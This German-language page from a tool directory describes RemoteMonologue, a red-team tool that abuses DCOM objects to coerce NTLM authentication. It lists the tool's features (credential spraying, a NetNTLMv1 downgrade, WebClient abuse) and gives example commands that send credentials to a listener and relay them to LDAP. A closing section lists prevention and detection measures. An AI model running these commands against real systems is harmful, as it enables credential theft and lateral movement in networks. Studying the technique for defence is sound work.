Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RemoteMonologue — DCOM für NTLM-Authentifizierungs-Coercions waffenwirksam machen | Kitploit
Tools/GitHubGitHub/3lp4tr0n/remotemonologue
AufklärungPasswortangriffeExploitationLaterale BewegungPost-ExploitationPenetrationstestsAuthentifizierungRed TeamingAdversarial-Angriff
GitHub3lp4tr0n/remotemonologue

RemoteMonologue

DCOM für NTLM-Authentifizierungs-Coercions waffenwirksam machen

21542vor 9 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

RemoteMonologue

RemoteMonologue ist eine Technik zur Erfassung von Windows-Anmeldedaten, die eine Kompromittierung von Remote-Benutzern ermöglicht, indem sie den Interactive-User-RunAs-Schlüssel ausnutzt und NTLM-Authentifizierungen über DCOM erzwingt.

Lesen Sie X-Force Reds RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions für detaillierte Informationen.

Funktionen

🔹 Authentifizierungserzwingung über DCOM (-dcom)

  • Zielt auf vier DCOM-Objekte (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession), um eine NTLM-Authentifizierung gegen einen angegebenen Listener (-auth-to) auszulösen.

🔹 Credential-Spraying (-spray)

  • Validiert Anmeldedaten auf mehreren Systemen und erfasst dabei auch Benutzeranmeldedaten.

🔹 NetNTLMv1-Downgrade-Angriff (-downgrade)

  • Zwingt Ziele zur Verwendung von NTLMv1, was das Knacken und Relayen von Anmeldedaten erleichtert.

🔹 Missbrauch des WebClient-Dienstes (-webclient)

  • Aktiviert den WebClient-Dienst, um HTTP-basierte Authentifizierungserzwingung zu ermöglichen.

🔹 Benutzer-Enumeration (-query)

  • Identifiziert Benutzer mit einer aktiven Sitzung auf dem Zielsystem.

Hinweis: Lokale Administratorrechte auf dem Zielsystem sind erforderlich.

Einrichtung

root@kitploit:~
pip install impacket

Beispiele

Im Folgenden finden Sie ein Beispiel für die Ausführung von RemoteMonologue mit dem NetNTLMv1-Downgrade-Angriff, während Responder als Listener verwendet wird. Standardmäßig verwendet das Tool das DCOM-Objekt ServerDataCollectorSet, wenn keine DCOM-Option angegeben ist.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Bild

Im Folgenden finden Sie ein weiteres Beispiel: Diesmal wird der Angriff mit dem DCOM-Objekt FileSystemImage ausgeführt und der WebClient-Dienst aktiviert, um eine HTTP-Authentifizierung zu erhalten, die anschließend mit ntlmrelayx an LDAP weitergeleitet wird.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Bild

Defensive Überlegungen

Zum Schutz vor und zur Erkennung dieser Techniken können mehrere vorbeugende Maßnahmen und Erkennungsmaßnahmen implementiert werden.

Vorbeugende Maßnahmen:

  1. LDAP-Signierung und Channel Binding aktivieren: Konfigurieren Sie die erzwungene LDAP-Signierung und das Channel Binding auf Domänencontrollern, um den LDAP-Endpunkt vor Relay-Angriffen zu schützen. Hinweis: Diese Einstellungen werden standardmäßig ab Windows Server 2025 erzwungen.

  2. Auf die neuesten Windows-Versionen aktualisieren: Aktualisieren Sie Server auf Windows Server 2025 und Arbeitsstationen auf Windows 11 Version 24H2, um NetNTLM-Downgrade-Angriffe zu entschärfen, da NTLMv1 in diesen Versionen entfernt wurde.

  3. SMB-Signierung erzwingen: Aktivieren und erzwingen Sie die SMB-Signierung auf Windows-Servern, um SMB-Relay-Angriffe zu verhindern.

  4. Starke Kennwortrichtlinien implementieren: Erzwingen Sie starke Kennwortanforderungen, um Angriffe zum Knacken von Kennwörtern zu erschweren.

Erkennungsmöglichkeiten:

  1. Remote-Zugriff auf DCOM-Objekte überwachen: Verfolgen Sie den Zugriff auf die betroffenen DCOM-Objekte und deren spezifische Eigenschaften und Methoden, um ungewöhnliche Aktivitäten zu identifizieren.

  2. Registrierungsänderungen überwachen: Überwachen Sie Änderungen an den Registrierungsschlüsseln RunAs und LmCompatibilityLevel.

  3. WebClient-Dienstaktivität verfolgen: Überwachen Sie Fälle, in denen der WebClient-Dienst remote aktiviert wird, da dieser zur Ermöglichung HTTP-basierter NTLM-Authentifizierungen verwendet wird.

Tool herunterladen